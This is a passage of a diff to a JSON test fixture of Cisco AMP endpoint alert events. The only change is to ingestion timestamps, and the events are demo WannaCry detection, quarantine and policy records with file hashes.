889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2718,7 +2718,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461665900Z", + "ingested": "2021-12-14T14:40:57.457054896Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":194000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741855\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -2812,7 +2812,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461671200Z", + "ingested": "2021-12-14T14:40:57.457055251Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741857\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2898,7 +2898,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461675200Z", + "ingested": "2021-12-14T14:40:57.457055840Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":163000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2972,7 +2972,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461679200Z", + "ingested": "2021-12-14T14:40:57.457056304Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":709000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", 
@@ -3044,7 +3044,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461682700Z", + "ingested": "2021-12-14T14:40:57.457056649Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214492323807000,\"timestamp\":1610631810,\"timestamp_nanoseconds\":447000000,\"date\":\"2021-01-14T13:43:30+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", 
@@ -3141,7 +3141,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461687200Z", + "ingested": "2021-12-14T14:40:57.457057100Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214488028840000,\"timestamp\":1610631809,\"timestamp_nanoseconds\":916000000,\"date\":\"2021-01-14T13:43:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -3219,7 +3219,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461693100Z", + "ingested": "2021-12-14T14:40:57.457057451Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945890085425,\"timestamp\":1610630976,\"timestamp_nanoseconds\":535214029,\"date\":\"2021-01-14T13:29:36+00:00\",\"event_type\":\"Potential Dropper Infection\",\"event_type_id\":1107296257,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610630976,\"start_date\":\"2021-01-14T13:29:36+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1107296257", "kind": "alert", 
@@ -3284,7 +3284,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:51.461698100Z", + "ingested": "2021-12-14T14:40:57.457057812Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412574627503014000,\"timestamp\":1610630889,\"timestamp_nanoseconds\":341000000,\"date\":\"2021-01-14T13:28:09+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", 
@@ -3348,7 +3348,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461703800Z", + "ingested": "2021-12-14T14:40:57.457058174Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":50000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -3436,7 +3436,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461709400Z", + "ingested": "2021-12-14T14:40:57.457058616Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769885\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3522,7 +3522,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461715100Z", + "ingested": "2021-12-14T14:40:57.457059101Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":34000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3596,7 +3596,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461720800Z", + "ingested": "2021-12-14T14:40:57.457059540Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802584\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -3672,7 +3672,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461743900Z", + "ingested": "2021-12-14T14:40:57.457059897Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802583\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -3748,7 +3748,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461750200Z", + "ingested": "2021-12-14T14:40:57.457060257Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802582\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -3824,7 +3824,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461773300Z", + "ingested": "2021-12-14T14:40:57.457060603Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802581\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -3900,7 +3900,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461779700Z", + "ingested": "2021-12-14T14:40:57.457060964Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -3999,7 +3999,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461784300Z", + "ingested": "2021-12-14T14:40:57.457061418Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":644000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":4688,\"disposit